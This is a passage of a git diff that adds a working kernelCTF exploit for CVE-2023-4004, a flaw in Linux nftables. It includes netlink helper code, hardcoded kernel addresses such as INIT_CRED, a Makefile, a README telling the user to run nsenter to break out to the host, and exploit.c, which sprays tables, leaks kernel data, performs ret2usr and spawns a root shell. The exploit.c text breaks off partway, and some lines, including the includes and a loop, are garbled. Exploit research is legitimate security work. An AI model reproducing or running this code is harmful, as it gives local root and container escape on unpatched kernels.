uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/setelem.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/setelem.h new file mode 100644 index 00000000..6e8a2a28 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/setelem.h @@ -0,0 +1,212 @@ +#define OBJ_FOR_REF "obj-for-ref" +#define ELEM_KEY_END "test-elem-key-end" +void new_setelem(struct nl_sock * socket,char *table_name, char *set_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + struct nl_msg *elem_end = nlmsg_alloc(); + char *key = malloc(0x40); + char *key_end = malloc(0x40); + memset(key,0xff,0x40); + memset(key_end,0xff,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, OBJ_FOR_REF); + //nla_put_u32(elem_nest, NFTA_SET_ELEM_FLAGS, htonl(NFT_SET_ELEM_CATCHALL)); + if(udata>0){ + nla_put(elem_nest, NFTA_SET_ELEM_USERDATA, ulen, udata); + } + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create setelem\n"); + } +} + + +void del_setelem(struct nl_sock * socket){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + char *key = malloc(0x40); + memset(key,0x41,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + //nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, "test-obj2"); + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, "test_table"); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, "test_set"); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len)*2 + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len)*2, hdr3, NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Delete setelem\n"); + } +} + +void elem_flush(struct nl_sock * socket, char *table_name, char *set_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Flush set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/spec.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/spec.h new file mode 100644 index 00000000..6e71e8aa --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/spec.h @@ -0,0 +1,2 @@ +#define INIT_CRED 0xFFFFFFFF83262120 +#define MODULE_CT_EXPECT_OBJ_TYPE_ADDR 0xFFFFFFFF83516840 diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/table.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/table.h new file mode 100644 index 00000000..a623f956 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/table.h @@ -0,0 +1,197 @@ +void new_table(struct nl_sock * socket, char *name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void new_table_with_udata(struct nl_sock * socket, char *name,char *udata, int len){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + nla_put(msg2,NFTA_TABLE_USERDATA,len,udata); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void get_table(struct nl_sock * socket, char *name){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETTABLE, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_string(msg, NFTA_TABLE_NAME, name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get table %s\n",name); + } +} +void del_table(struct nl_sock * socket, char *table_name){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_TABLE_NAME, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/Makefile b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/Makefile new file mode 100644 index 00000000..e2a6e2ce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/Makefile @@ -0,0 +1,9 @@ +exploit: + gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static +prerequisites: + sudo apt-get install libnl-nf-3-dev +run: + ./exploit + +clean: + rm exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/README b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/README new file mode 100644 index 00000000..eada68f2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/README @@ -0,0 +1,2 @@ +Exploit for kctf LTS 6.1.36 +Run command "nsenter --target 1 -m -p" after run the poc. diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/chain.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/chain.h new file mode 100644 index 00000000..4245eb47 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/chain.h @@ -0,0 +1,56 @@ +void new_chain(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name); + nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create chain %s\n",chain_name); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit new file mode 100755 index 00000000..ef86eb7a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit.c b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit.c new file mode 100644 index 00000000..6c1bffe4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/exploit.c @@ -0,0 +1,361 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "obj.h" +#include "setelem.h" +#include "table.h" +#include "set.h" +#include "rule.h" +#include "chain.h" +#include "spec.h" +#define THREAD_MAX_NUM 100 +#define SET_TABLE "set-table" +#define OBJ_FOR_REF "obj-for-ref" +#define OBJ_TABLE "obj-table" + +char *leak_obj=NULL; +char *target_table=NULL; +char *leak_data=NULL; +int ct_expect_obj_num = 0; +int table_num = 0; + +unsigned long user_cs,user_ss,user_rsp,user_rflags; +uint64_t kernel_off, module_base, type_addr, prepare_kernel_cred, commit_creds; +uint64_t set_num = 0; +static void save_state() { + asm( + "movq %%cs, %0\n" + "movq %%ss, %1\n" + "movq %%rsp, %2\n" + "pushfq\n" + "popq %3\n" + : "=r" (user_cs), "=r" (user_ss), "=r" (user_rsp),"=r" (user_rflags) : : "memory"); +} + + +void shell(){ + printf("ret2usr success! uid : %d\n",getuid()); + //char *args[] = {"/bin/sh", "-c", "nsenter --target 1 -m -p;/bin/bash",NULL}; + char *args[] = {"/bin/sh", "-i", NULL}; + execve(args[0], args, NULL); +} + +int nl_callback_find_target_table(struct nl_msg* recv_msg, void* arg) +{ + + struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg); + struct nlattr * tb_msg[NFTA_TABLE_MAX+1]; + memset(tb_msg,0,NFTA_TABLE_MAX * 8); + + if (ret_hdr->nlmsg_type == NLMSG_ERROR) { + //fprintf(stderr, "Received NLMSG_ERROR message!\n"); + return NL_STOP; + } + + struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg)); + int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg)); + nla_parse(tb_msg, NFTA_TABLE_MAX, attr, attrlen, NULL); + char * table_name=NULL; + if (tb_msg[NFTA_TABLE_NAME]) { + table_name = nla_get_string(tb_msg[NFTA_TABLE_NAME]); + //printf("Get table: '%s'\n", table_name ); + } + if (tb_msg[NFTA_TABLE_USERDATA]){ + uint64_t * val = malloc(nla_len(tb_msg[NFTA_TABLE_USERDATA])); + nla_memcpy(val, tb_msg[NFTA_TABLE_USERDATA], nla_len(tb_msg[NFTA_TABLE_USERDATA])); + //printf("data[0] = %lx\n", val[0]); + if((val[0]&0xfffffffffffff000)!= 0x4c00000000000000 && val[0] != 0){ + printf("Get table: '%s'\n", table_name ); + printf("data[0] = %lx\n", val[0]); + leak_obj = (char *)val; + target_table = malloc(strlen(table_name)+1); + strcpy(target_table,table_name); + leak_data = (char *)val; + } + } + return NL_OK; +} + + +int nl_callback_for_obj(struct nl_msg* recv_msg, void* arg) +{ + + struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg); + struct nlattr * tb_msg[NFTA_OBJ_MAX+1]; + memset(tb_msg,0,NFTA_OBJ_MAX * 8); + + if (ret_hdr->nlmsg_type == NLMSG_ERROR) { + //fprintf(stderr, "Received NLMSG_ERROR message!\n"); + return NL_STOP; + } + + struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg)); + int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg)); + nla_parse(tb_msg, NFTA_OBJ_MAX, attr, attrlen, NULL); + char * obj_name=NULL; + if (tb_msg[NFTA_OBJ_NAME]) { + obj_name = nla_get_string(tb_msg[NFTA_OBJ_NAME]); + printf("Get obj: '%s'\n", obj_name ); + } + if (tb_msg[NFTA_OBJ_USERDATA]){ + uint64_t * val = malloc(nla_len(tb_msg[NFTA_OBJ_USERDATA])); + nla_memcpy(val, tb_msg[NFTA_OBJ_USERDATA], nla_len(tb_msg[NFTA_OBJ_USERDATA])); + printf("data[0] = %lx\n", val[0]); + leak_data = (char *)val; + } + return NL_OK; +} + +int setup_sandbox(void) { + if (unshare(CLONE_NEWUSER) < 0) { + perror("[-] unshare(CLONE_NEWUSER)"); + return -1; + } + if (unshare(CLONE_NEWNET) < 0) { + perror("[-] unshare(CLONE_NEWNET)"); + return -1; + } + return 0; +} + +void spray_tables(struct nl_sock * socket, int len, char *udata, int size){ + char *tmp = malloc(0x100); + memset(tmp,0,0x100); + int i; + for(i=0;infgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + 